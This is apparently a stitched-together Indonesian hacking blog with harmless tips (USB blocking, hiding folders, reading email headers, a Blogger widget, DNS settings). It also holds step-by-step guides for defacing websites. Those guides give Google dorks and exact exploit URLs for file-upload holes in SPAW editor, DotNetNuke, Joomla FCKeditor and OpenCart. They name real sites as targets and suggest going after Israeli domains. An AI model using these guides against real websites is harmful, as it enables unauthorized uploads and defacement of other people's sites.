Newbie Sejati

Blokir Akses USB dengan device block, maksudnya apa ni....??? mungkin bagi yang belum tau pada bingung ni. dari pada bingung² mending ane jelasin aja y....


kali ini saya akan sharing sedikit tentang tools yang bernama Device Block, tools ini berguna untuk memproteksi Device² yang masuk ke kumputer kita. Contohnya flashdisk. jadi setiap ada device yang masuk harus memasukan password sesuai dengan password yang telah kita setting, klo gk maka flasdisk tersebut gk bakalan bisa di akses. jadi gk sembarang orang bisa masukin flashdisk ke komputer. kita gmana udah ngertikan maksudnya....


software Device Block ini bisa memblokir device2 yang digunakan untuk sambungan perangkat
USB (Flashdisk, memory card, mmc,dsb) untuk lebih jelasnya lihat screenshot berikut.

hahahaha........... asyik gk tu kalo kita Deface web dapet dollar????? kayaknya asyik dech...

ni perhatikan baik baik buat para defacer jangan marah ha.., menurut loe ada gk untungnya loe deface² selama ini...???? gk da kan... apa yang loe hasilkan hanya ngerusak website orang lain... mending kalo kita pelajarin dan dapet ilmu dari kerjaan yang kita lakukan itu, klo gk... kita ngerusak dan ngerusak terus menerus dengan membuat tampilan deface'an kita seindah / semenarik mungkin dengan membubuhi tulisan "hacked by ..." atau apalah itu.

hei bro buka mata & pikiran kalian, mending kalian hasilkan uang dari hobby loe tu... ini buka carding y, klo carding mah ane gak ngerti maklum newbie sejati....
lagian carding sekarang susah bisa² kalian pasan barang yang ngantarnya Interpol/FBI hiii takut, ane masih kuliah belum sarjana....ntar apa kata ortu gue.

ini mo ngomongin Deface web dapet dollar apa mo ngomongin carding......???? oia jadi lupa....

lanjut omz... ni ane baru kepikiran semalam gimana klo ane ambil sedikit keuntungan dari kesenangan gue deface daripada ane deface/ngerusak website orang gk da untungnya... kayaknya belum saatnya dech ane share tuturnya sekarang kayanya nunggu respond dulu dari orang² yang baca ini, lagi pula ane mo buat dulu tutorialnya.......

berikan respond anda dikolom komentar, apakah tutorial ini ane share atau gk?????

wew....sorry ni bro klo nungguin. ane tadi cuma becanda. apalah saya saya hanya seorang Newbie Sejati.....

Ni saya bagi sedikit hadiah....... karna telah mau berkunjung ke blog saya yang jelek ini........
jangan marah ha................ download aja langsung filenya nya

Sekedar Documentasi

Hahahaha........... saya kembali lagi dengan sedikit trik untuk menyembunyikan folder. trik ini berbeda dengan hidden folder. kalau pake hidden folder masih akan kelihatan ketika kita buka Tools>>>Folder Options>>>Views>>>Show hidden files and folders. tapi kali ini gk bisa dilihat dengan cara itu. folder yang kita sembunyikan hanya dapat diketahui dengan cara menyorot atau memblog Direcktory-nya...
oke langsung saja saya mulai.........

Menghapus Nama Folder

1. buat Folder baru atau pilih Folder yang ingin anda sembunyikan.
2. klik kanan folder tersebut kemudian pilih rename (ubah nama)
3. hapus nama atau lansung tekan Alt+255 ◄---- pake NumPad klo gk, gk bakal berhasil

1. klik kanan folder yang tadi pilih Proprties.
2. pindah ke tab customize
3. change icon kemudian gulir hingga ketemu icon yang kosong seperti dibawah ini

4. ok

Berikut saya memberikan sebuah tutorial bagaimana anda bisa melihat IP Address dan info detail pengirim email. cuma sekedar sharing pengatahuan, saya gak tau apakah tutorial ini bermanfaat (berguna) bagi anda.


ok langsung saja saya bahas bagaimana Cara Melihat IP Address Pengirim Email



Untuk Gmail / Google Mail.

1. Login ke account email anda ( http://gmail.com/ ).
2. Masuk ke inbox
3. Buka salah satu email yang ingin anda lihat,
4. Lihat kanan di bagian atas ada pilihan Reply, terus disamping tulisan
   Reply ada tanda panah ke bawah, klik tanda panah tersebut dan pilih Show Original (tampilkan yang asli).
5. Maka anda bisa mengetahui ip address pengirim email dan info detail yang lain.

1.  Login ke account email ( http://mail.yahoo.com/ ).
2. Masuk ke inbox dan buka salah satu email yang ingin anda lihat.
3. Pada pojok kanan bawah cari menu tulisan “Full Headers” dan klik tulisan tersebut.
4. Maka anda bisa mengetahui ip address pengirim email dan info detail
   yang lain.

1. Login ke account email anda ( http://hotmail.com/ ). 
2. Buka salah satu email yang ingin anda lihat
3. Klik kanan email tersebut dan pilih View Source.
4. Maka anda bisa mengetahui ip address pengirim email dan info detail
   yang lain.

1. Buka program Outlook Express dan login ke email anda. 
2. Klik kanan pada salah satu email yang ingin anda lihat.
3. Klik menu Properties.
4. Klik tab Detail.
5. Maka anda bisa mengetahui ip address pengirim email dan info detail
   yang lain.

1.  Buka program Outlook Express dan login ke email anda. 
2. Klik kanan pada salah satu email yang ingin anda lihat dan pilih Options 
3. Maka anda bisa mengetahui ip address pengirim email dan info detail
   yang lain.

Ok kembali lagi bersama 70H4N 7M di Newbie Sejati, untuk membahas tutorial Spaw Upload Vulnerably / Spaw Editor Remote File Upload / Spaw File Manager. 


tanpa basa-basi lagi langsung kita tancap gas, gak usah pake rem lagi......

Tutorial Spaw Upload Vulnerably

dork [ spaw2/dialogs/ ] dan 
     [ spaw2/uploads/files/ ]

pertama-tama langsung kita cari target dengan memasukkan salah satu dork diatas di mesin pencari (google)

klo udah dapat target misalkan http://www.simoncarves.com/admin/spaw2/uploads/files/SC.pdf 

ganti spaw2/uploads/files/SC.pdf dengan spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files maka akan muncul tampilan halaman/ form buat upload File.
ganti lokasi penyimpanan / directory jadi files seperti gambar dibawah ini.

Deface ala DotNetNuke. Sebelum kita mulai tutorial Deface ala DotNetNuke ini, mungkin di antara anda ada yang ber-tanya²  apa itu DotNetNuke...??? bagi yang belum tahu silahkan baca Disini. udah taukan??? nah klo udah tau mari kita langsung operasi.

sebenarnya bugs ini termasuk bugs lama, tapi masih banyak yang guna'in web aplikasi ini.............
postingan ini buka yang pertama kali ane post. pertama kali ane post di Forum MEH kemudian digroup Facebook Blackbox Guardian Yang berganti Nama Jadi Red Alpha. Terus Di forum BCC nah yang ane disini kali keempat-nya. itung-itung  buat nambah² archive Blog..hehehehehe

langsung saja

1. Sapkan file deface anda
contoh bisa di lihat di sini >> http://www.familyabusecenter.org/portals/0/70h4n-7m.txt
lalu save di notepad dengan nama file terserah anda contoh 70h4n-7m.txt

2.mencari target web

dork >> inurl:”/portals/0″
search di google...!!

3. jalankan aksi
setelah kita search digoole dan menemukan target
contoh >> http://www.familyabusecenter.org/portals/0/70h4n-7m.txt << Target sekarang ganti "portals/0/70h4n-7m.txt" dengan >> Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

hingga seperti ini >> http://www.familyabusecenter.org/Pro...nkgallery.aspx
Enter..!!

lalu klik/ceklist Link Type: >> File ( A File On Your Site )

setelah di klik atto ceklis,hapus link di URL...!!
http://www.familyabusecenter.org/Pro...nkgallery.aspx
/\
||
||
hapus semua..!!
lalu masukan ini di URL >> javascript:__doPostBack('ctlURL$cmdUpload','')
>>>ENTER..!!

lalu silahkan Upload dari kompi/PC anda file yg td di save contoh 70H4N-7M.txt
klik >> Upload Selected File

Catatan: Anda hanya dapat meng-upload type file:*. swf, *. jpg, *. jpeg, *. JPE, *. gif, *. bmp, *. png, *. doc, *. xls, *. ppt, *. pdf, *. txt, *. xml, *. xsl, *. css, *. zip, *. 3gp, *. asf, *. asx, *. avi, *. flv, *. m4v, *. mov, *. mp4, *. mpe, *. mpeg, *. mpg, *. ram, *. rm, *. rmvb, *. wm, *. wmv, *. vob
tetapi admin dapat mengubah ini

selesai upload nanti kelihatan di File Name contoh: 70H4N-7M.txt
untuk melihat hasilnya >> nama web/Portals/0/nama file

contoh >> http://www.familyabusecenter.org/portals/0/70h4n-7m.txt

Selesai dech........
dari tutor diatas silahkan di explore kemampuan anda

Selamat mencoba

Joomla mambots File Upload Vulnerability, hehehehe..... sorry y kalo judulnya agak aneh soalnya ane buat sendiri tu judul, habisnya gk tau apa nama teknik/ tutorial yang bakal ane jelasin ini.

Gk pake basa-basi lagi malas ane ngetik-nya lagi. lansung kita ke topik pembahasan....

1. cari digoogle dengan dork inurl:index.php?option=com_content contoh ane dapet http://www.thomaskoetzing.de/index.php?option=com_content&task=view&id=57&Itemid=97
2. kemudian hapus index.php?option=com_content&task=view&id=57&Itemid=97 ganti dengan mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?T
   ype=File&Connector=connectors/php/connector.php maka jadiny http://www.thomaskoetzing.de/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php  akan muncul halaman/ form untuk upload file maukkan file deface anda. ingat type file yang bisa di upload berbeda-beda. nah disini ane cuma buat coba² jadi ane masukin file txt.
3. apabila selesai mengupload file maka file kita akan muncul di form/halam itu....
4. untuk melihat dimana lokasi file kita dilettakan. blok dan klik kanan file yang barusan kita upload kemudian pilih View Selection Source, akan muncul seperti berikut

Kurang lebih seperti itu tampilannya. kita lihat filenya ada di directory /File/ jadi letaknya ada di http://www.thomaskoetzing.de/File/70h4n.txt

1.  Login Diblogger Seperti Biasa.
2. Pada halaman DASBOR Pilih rancangan
3. Kemudian tambahkan gadget
4. pilih HTML/JavaScript
5. isikan kolom judul terserah anda.....
6. kemudian copy paste kode berikut di kolom konten

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>

<style media="screen" type="text/css">

<!--

#spylist {overflow:hidden;margin-top:5px;padding:0px 0px;height:350px;}

#spylist ul{width:220px;overflow:hidden;list-style-type: none;padding: 0px 0px;margin:0px 0px;}

#spylist li {width:208px;padding: 5px 5px;margin:0px 0px 5px 0px;list-style-type:none;float:none;height:70px;

overflow: hidden;background:#000;border:1px solid #ddd;}

#spylist li a {text-decoration:none;color:#4B545B;font-size:11px;height:18px;overflow:hidden;padding:0px 0px 2px 0px;}

#spylist li img {float:left;margin-right:5px;background:#EFEFEF;border:0;}

.spydate{overflow:hidden;font-size:10px;color:#0284C2;padding:2px 0px;margin:1px 0px;height:15px;

font-family:Tahoma,Arial,verdana, sans-serif;}

.spycomment{overflow:hidden;font-family:Tahoma,Arial,verdana, sans-serif;font-size:10px;color:#262B2F;}

-->

</style>

<script language="JavaScript">

imgr = new Array();

imgr[0] = "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgULQUwzoiDe9rJeZ1wE09lTTR7mW4BJDPHXeHkgsFgZctwR6BWGYBWuTYndLi6AAmpUC4nM0emwa9dbAD0vXOiFgCe9iDehTcwXZ-CTA13Zjr8DrUsPYsUOFzswBFi-rvkqvgOknEaB__V/s220/cyber.png";

imgr[1] = "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgULQUwzoiDe9rJeZ1wE09lTTR7mW4BJDPHXeHkgsFgZctwR6BWGYBWuTYndLi6AAmpUC4nM0emwa9dbAD0vXOiFgCe9iDehTcwXZ-CTA13Zjr8DrUsPYsUOFzswBFi-rvkqvgOknEaB__V/s220/cyber.png";

imgr[2] = "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgULQUwzoiDe9rJeZ1wE09lTTR7mW4BJDPHXeHkgsFgZctwR6BWGYBWuTYndLi6AAmpUC4nM0emwa9dbAD0vXOiFgCe9iDehTcwXZ-CTA13Zjr8DrUsPYsUOFzswBFi-rvkqvgOknEaB__V/s220/cyber.png";

imgr[3] = "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgULQUwzoiDe9rJeZ1wE09lTTR7mW4BJDPHXeHkgsFgZctwR6BWGYBWuTYndLi6AAmpUC4nM0emwa9dbAD0vXOiFgCe9iDehTcwXZ-CTA13Zjr8DrUsPYsUOFzswBFi-rvkqvgOknEaB__V/s220/cyber.png";

imgr[4] = "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgULQUwzoiDe9rJeZ1wE09lTTR7mW4BJDPHXeHkgsFgZctwR6BWGYBWuTYndLi6AAmpUC4nM0emwa9dbAD0vXOiFgCe9iDehTcwXZ-CTA13Zjr8DrUsPYsUOFzswBFi-rvkqvgOknEaB__V/s220/cyber.png";

showRandomImg = true;

boxwidth = 255;

cellspacing = 6;

borderColor = "#232c35";

bgTD = "#000000";

thumbwidth = 70;

thumbheight = 70;

fntsize = 12;

acolor = "#666";

aBold = true;

icon = " ";

text = "comments";

showPostDate = true;

summaryPost = 40;

summaryFontsize = 10;

summaryColor = "#666";

icon2 = " ";

numposts = 10;

home_page = "http://www.satriacell.com/";

limitspy=4

intervalspy=4000

</script>

<div id="spylist">

<script type='text/javascript'>

jQuery(function(){jQuery("ul.spy").simpleSpy(limitspy,intervalspy).bind("mouseenter",function(){jQuery(this).trigger("stop")}).bind("mouseleave",function(){jQuery(this).trigger("start")})});(function(e){e.fn.simpleSpy=function(f,g){f=f||4;g=g||5000;return this.each(function(){var l=e(this),k=true,i=[],m=f,o=0,h=l.find("> li:first").height();l.find("> li").each(function(){i.push("<li>"+e(this).html()+"</li>")});o=i.length;l.wrap('<div class="spyWrapper" />').parent().css({height:h*f});l.find("> li").filter(":gt("+(f-1)+")").remove();l.bind("stop",function(){k=false}).bind("start",function(){k=true});function n(){if(k){var p=e(i[m]).css({height:0,opacity:0,display:"none"}).prependTo(l);l.find("> li:last").animate({opacity:0},1000,function(){p.animate({height:h},1000).animate({opacity:1},1000);e(this).remove()});m++;if(m>=o){m=0}}setTimeout(n,g)}n()})}})(jQuery);function showrecentposts(z){document.write('<ul class="spy">');j=(showRandomImg)?Math.floor((imgr.length+1)*Math.random()):0;img=new Array();for(var o=0;o<numposts;o++){var w=z.feed.entry[o];var g=w.title.$t;var f;var p;if(o==z.feed.entry.length){break}for(var l=0;l<w.link.length;l++){if(w.link[l].rel=="alternate"){p=w.link[l].href;break}}for(var l=0;l<w.link.length;l++){if(w.link[l].rel=="replies"&&w.link[l].type=="text/html"){f=w.link[l].title.split(" ")[0];break}}if("content" in w){var r=w.content.$t}else{if("summary" in w){var r=w.summary.$t}else{var r=""}}postdate=w.published.$t;if(j>imgr.length-1){j=0}img[o]=imgr[j];s=r;a=s.indexOf("<img");b=s.indexOf('src="',a);c=s.indexOf('"',b+5);d=s.substr(b+5,c-b-5);if((a!=-1)&&(b!=-1)&&(c!=-1)&&(d!="")){img[o]=d}cmtext=(text!="no")?'<i><font color="'+acolor+'">('+f+" "+text+")</font></i>":"";var q=[1,2,3,4,5,6,7,8,9,10,11,12];var x=["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"];var u=postdate.split("-")[2].substring(0,2);var h=postdate.split("-")[1];var t=postdate.split("-")[0];for(var e=0;e<q.length;e++){if(parseInt(h)==q[e]){h=x[e];break}}var n=(showPostDate)?'<i><font color="'+acolor+'"> ('+u+" "+h+" "+t+")</font></i>":"";g=(aBold)?"<b>"+g+"</b>":g;var v='<li><a href="'+p+'"><img src="'+img[o]+'" width="'+thumbwidth+'" height="'+thumbheight+'" class="recent-thumb"/></a><a href="'+p+'" class="recent-link">'+g+'</a><div class="spydate">'+n+'</div><div class="spycomment">'+cmtext+"</div>";document.write(v);j++}document.write("</ul>")}document.write('<script src="'+home_page+"feeds/posts/default?max-results="+numposts+'&orderby=published&alt=json-in-script&callback=showrecentposts"><\/script>');

</script>

</div>

7. Save Dan lihat hasilnya....

1. Masuk Control Panel dan Pilih Network Connection
2. Klik kanan pada Local Area Connection pilih Propertis
3. Double klik "Internet Protocol (TCP/IP)"

DNS nawala Preferred DNS Service :180.131.144.144 AlternatebDNS Service :180.131.145.145
4. Isikan DNS nawala pada kolom DNS seperti terlihat gambar di atas, setelah selesai klik Ok

Deface ala Opencart atau Opencart remote file Upload Vulnerability merupakan salah satu cara buat deface sebuah web yang support opencart, sebenarnya bugs ini termasuk bugs lama, namun berhubung banyaknya pertanyaan-pertanyaan yang masuk ke-saya melalui jejaring sosial sebut saja facebook. "Omz johan gimana sich deface menggunakan opencart...???" kurang lebih seperti itu pertanyaan yang masuk kesaya. ada juga yang lansung ngomong melalui chatroom "Om johan omz ajarin aku opencart donk" padahal duluan dia dibanding saya kenal dunia deface Sebut saja "DYAZ M.R" Sorry y omz Dyaz namanya ane masukin dipostingan ni...hehehehe.

Berhubung saya gk bisa merangkai kata² lg mending kita langsung aja y.................
Pertama-tama masukkan dork "Powered By OpenCart" di google anda bisa menambah Nama domain negara tujuan misalnya "Powered By OpenCart" site:il untuk negara Israel.
misalkan kita dapatkan http://emanuel-tehila.co.il/index.php?route=product/category&path=66_30_35. nah sepertinya OpenCart-nya ada di halaman awal. hapus index.php?route=product/category&path=66_30_35 ganti dengan admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

maka akan muncul halan untuk mengupload File kurang lebih seperti gambar dibawah ini tampilannya.

1. Jangan membuka atau menerima file yang di dapat dr email, mirc dan messenger kalau anda belum kenal dengan pengirimnya dan belum yakin file itu berisi virus.
2. Kalau anda browser ke situs yang tidak anda kenal, matikan program java & java script. Matikan juga fitur install auto atau install on demand supaya program yang berisi virus tidak akan masuk secara otomatis ke komputer anda.
3. Kalau membuka disket, CD, DVD, USB drive dan media luar apapun bentuknya, scan dahulu dengan program antivirus untuk memastikan itu benar-benar aman.

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

              Konsep dasar SQL Injection | wah ini postingan pertama ane ni tentang hacking. bagi para mastah mohon koreksi ntambahanya.